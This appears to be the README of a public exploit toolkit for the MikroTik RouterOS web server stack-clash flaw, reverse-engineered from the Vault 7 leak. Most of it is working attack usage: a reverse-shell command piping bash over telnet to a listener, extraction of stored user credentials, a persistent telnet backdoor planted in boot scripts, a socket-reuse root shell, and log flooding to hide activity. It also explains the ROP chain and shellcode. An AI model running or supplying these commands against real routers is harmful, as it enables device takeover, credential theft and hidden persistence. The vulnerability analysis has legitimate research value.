Reverse engineering of Mikrotik exploit from Vault 7 CIA Leaks
See the PDF for more info (not updated)
Until RouterOS 6.38.4
What's new in 6.38.5 (2017-Mar-09 11:32):
!) www - fixed http server vulnerability;
CrashPOC
Simple crash sending -1 as content-length in post header
StackClashPOC
Stack clash exploit using two threads, missing ROP chain
As the ROP is dynamically created, you have to extract the www binary from the RouterOS firmware.
(It's placed in /nova/bin/)
Check that the running version is the same.
To simplify extraction you can use:
$ ./tools/getROSbin.py 6.38.4 x86 /nova/bin/www www_binary
StackClash_x86
Stack clash exploit using two threads with ROP chain to run bash commands
Reverse shell:
In a shell:
$ nc -l -p 1234
In another shell:
$ ./StackClash_x86.py 192.168.8.1 80 www_binary "/bin/mknod /ram/f p; /bin/telnet 192.168.8.5 1234 < /ram/f | /bin/bash > /ram/f 2>&1"
Where:
- RouterOS IP: 192.168.8.1
- PC IP: 192.168.8.5
Extract users and passwords
$ ./StackClash_x86.py 192.168.8.1 80 www_binary "cp /rw/store/user.dat /ram/winbox.idx"
$ sleep 3 # (wait some seconds that www is restarted)
$ curl -s http://192.168.8.1/winbox/index | ./tools/extract_user.py -
Export configs
You can execute command in Mikrotik console with /nova/bin/info.
Eg: /nova/bin/info "/system reboot" will reboot the system.
$ ./StackClash_x86.py 192.168.8.1 80 www_binary "/nova/bin/info '/export' > /ram/winbox.idx"
$ sleep 20 # (it's a bit slow to execute /export command)
$ curl -s http://192.168.8.1/winbox/index
StackClash_mips
Stack clash exploit using two threads with ROP chain + shell code to run bash commands
On mips version of www the stack is RWX, so we can jump to the stack.
You can run the same bash command as the x86 version.
LCD
Funny command
$ ./tools/getROSbin.py 6.38.4 mipsbe /nova/bin/www www_binary
$ ./StackClash_mips.py 192.168.8.1 80 www_binary "echo hello world > /dev/lcd"
Super Mario sound
Do not do it! ;-P
$ ./StackClash_mips.py 192.168.8.1 80 www_binary "while [ true ]; do /nova/bin/info ':beep frequency=660 length=100ms;:delay 150ms;:beep frequency=660 length=100ms;:delay 300ms;:beep frequency=660 length=100ms;:delay 300ms;:beep frequency=510 length=100ms;:delay 100ms;:beep frequency=660 length=100ms;:delay 300ms;:beep frequency=770 length=100ms;:delay 550ms;:beep frequency=380 length=100ms;:delay 575ms;:beep frequency=510 length=100ms;:delay 450ms;:beep frequency=380 length=100ms;:delay 400ms;:beep frequency=320 length=100ms;:delay 500ms;:beep frequency=440 length=100ms;:delay 300ms;:beep frequency=480 length=80ms;:delay 330ms;:beep frequency=450 length=100ms;:delay 150ms;:beep frequency=430 length=100ms;:delay 300ms;:beep frequency=380 length=100ms;:delay 200ms;:beep frequency=660 length=80ms;:delay 200ms;:beep frequency=760 length=50ms;:delay 150ms;:beep frequency=860 length=100ms;:delay 300ms;:beep frequency=700 length=80ms;:delay 150ms;:beep frequency=760 length=50ms;:delay 350ms;:beep frequency=660 length=80ms;:delay 300ms;:beep frequency=520 length=80ms;:delay 150ms;:beep frequency=580 length=80ms;:delay 150ms;:beep frequency=480 length=80ms;:delay 500ms;'; done"
Upload binaries
To upload busybox-mips in /ram/busybox
In a shell:
$ wget https://busybox.net/downloads/binaries/1.28.1-defconfig-multiarch/busybox-mips
$ { echo "echo Uploading..."; hexdump -v -e '"echo -e -n " 1024/1 "\\\\x%02X" " >> /ram/busybox\n"' busybox-mips | sed -e "s/\\\\\\\\x //g"; } | nc -l -q 0 -p 1234
In another shell (note that this is the reverse shell command):
$ ./StackClash_mips.py 192.168.8.1 80 www_binary "/bin/mknod /ram/f p; /bin/telnet 192.168.8.5 1234 < /ram/f | /bin/bash > /ram/f"
and wait until the connection automatically close.
(Once the file is uploaded, run again reverse shell (this time only listening with nc -l -p 1234) and you will find busybox inside /ram/)
Persistent telnet server
You can run script at each boot by creating a bash script in /flash/etc/rc.d/run.d/.
Pay attention to set execution permissions, or your router will stuck on boot and you will have to restore the firmware!
This example enables a persistent telnet server on port 23000.
In a shell:
$ wget https://busybox.net/downloads/binaries/1.28.1-defconfig-multiarch/busybox-mips
$ { echo "echo Installing..."; hexdump -v -e '"echo -e -n " 1024/1 "\\\\x%02X" " >> /flash/bin/busybox\n"' busybox-mips | sed -e "s/\\\\\\\\x //g"; echo "chmod 777 /flash/bin/busybox"; echo "/flash/bin/busybox --install -s /flash/bin/"; echo "mkdir -p /flash/etc/rc.d/run.d"; echo 'echo -e "#!/flash/bin/sh\ntelnetd -p 23000 -l sh" > /flash/etc/rc.d/run.d/S89own'; echo "chmod 777 /flash/etc/rc.d/run.d/S89own"; echo "/nova/bin/info '/system reboot'"; echo "echo Done! Rebooting..."; } | nc -l -p 1234
In another shell (note that this is the reverse shell command):
$ ./StackClash_mips.py 192.168.8.1 80 www_binary "/bin/mknod /ram/f p; /bin/telnet 192.168.8.5 1234 < /ram/f | /bin/bash > /ram/f"
and wait until Done! Rebooting... appears.
Once the router is up again:
$ telnet 192.168.8.1 23000
Trying 192.168.8.1...
Connected to 192.168.8.1.
Escape character is '^]'.
MikroTik v6.38.4 (stable)
/ #
StackClash_resock_mips
Reuse the http socket to spawn a shell, so you can have a shell without a reverse connection.
$ ./tools/getROSbin.py 6.38.4 mipsbe /nova/bin/www www_binary
$ ./StackClash_resock_mips.py 192.168.8.1 80 www_binary
[...]
sh: turning off NDELAY mode
Got root ;-)
Upload binaries without a reverse shell
To upload busybox-mips in /ram/busybox
$ wget https://busybox.net/downloads/binaries/1.28.1-defconfig-multiarch/busybox-mips
$ ./StackClash_resock_mips.py 192.168.8.1 80 www_binary busybox-mips /ram/busybox
[...]
Uploading busybox-mips in /ram/busybox...
Upload done!
sh: turning off NDELAY mode
Got root ;-)
chmod 777 /ram/busybox
/ram/busybox
BusyBox v1.28.1 (2018-02-15 14:34:02 CET) multi-call binary.
[...]
Change boot logo
Only RGB Bitmap 24 bit (not compressed) files are supported.
Max size: 160px width, 76px height
You can find a sample here
$ ./StackClash_resock_mips.py 192.168.8.1 80 www_binary docs/logo.bmp /flash/boot/logo.bmp
[...]
Uploading docs/logo.bmp in /flash/boot/logo.bmp...
Upload done!
sh: turning off NDELAY mode
Got root ;-)
reboot
*** Connection closed by remote host ***
Hide logs
To remove logs after your post exploitation actions
/ # /nova/bin/info ":for i from=1 to=1000 do={ :log info message='Some dummy info' }"
Where does one get the chimay-red.py file, that this tool kit relies on?
This is a reverse engineering of leaked CIA documentation.
There is no chimay-red.py publicly available.
I can't understand how the stack clash work.
I'll update the PDF as soon as I have enough time, anyway:
We know that:
- each thread has 128KB of stack
- each stack of each thread is stacked on the top of the previous thread.
Thanks to Content-Length and alloca macro we can control the Stack Pointer and where the post data will be written.
If we send a Content-Length bigger than 128KB to socket of thread A, the Stack Pointer will point inside the stack of another thread (B) and so the POST data (of thread A) will be written inside the stack of thread B (in any position we want, we only need to adjust the Content-Length value).
So now we can write a ROP chain in the stack of thread B starting from a position where a return address is saved.
When we close the socket of thread B, the ROP chain will start because the function that is waiting for data will return (but on our modified address).
x86
The ROP chain construct "system" string and "your_shell_cmd" string looking for chunks of strings inside the binary and concatenating them in an unused area of memory.
Then we return to "dlsym" function (present in the PLT) passing as argument the address of just created string "system" to find the address of "system" function.
Now we can return to the address of system passing as argument the address of the just created string "your_shell_cmd".
mips
DEP is disabled on this version of www, so I can execute the stack.
But I cannot use system function because "/bin/sh" is not present on the file system, so I used execve directly.
A small ROP (3 gadgets) find the address of a location on the stack (where I put the shell code), and then jump to that address.
In the shell code I make a fork (syscall 4002), then I populate an array of 4 pointers with the address of the strings "/bin/bash", "-c", "your_shell_cmd" using the leaked address of the stack (the last pointer is left NULL).
Then I populate a0, a1, a2 with rispectively: address of "/bin/bash", address of the array populated at the preceeding step and the address of the NULL entry of the array.
At this point I can launch the syscall 4011 (execve) to execute my bash command.
Not wokring on some versions
I have no time to test all RouterOS versions.
On all stable version i tested (6.28, 6.27, 6.37.2, 6.37.3, 6.38.3, 6.38.4) it is working (both x86 and mipsbe).
On 6.37.5 it isn't working, but I noticed that this is a bugfix version.
Maybe on all bugfix version my tool is not working (not verified).
HTTPS
I implemented the HTTPS version using ssl.wrap_socket and it is working if www has just started.
But if www has been running for some time I have to make it crash before running the exploit.
If I make www crash with HTTPS enabled, then www doesn't bind on HTTPS socket any more...
So for now I didn't include HTTPS support in the public release because in most scenario it is totally NOT working and make the web server unreachable after the crash.
Architecture discovery
I didn't find a way to discover the architecture via the web server (www).
I think the CIA tool was using MNDP (Mikrotik Network Discovery Protocol), but it is only available in the same LAN, so it will not work from a remote network.
So I didn't include the architecture discovery in my tool.
You have to test all the archtecture if you are remotely or use a MNDP tool if you in the same LAN (there are a lots of MNDP tools on github).
Others architectures than x86 and MIPSBE/SMIPS
I have no boards based on ARM, TILE, PowerPC and MMIPS, so I can't debug the vulnerability on these versions.
(Probably for the last one it is enough to convert the mipsbe addresses in little endian).
If you can support other arch then send a PR!
Firmware upgrade persistence
It's possibile to make your rootkit persistent to firmware upgrade by customizing the initramfs...more info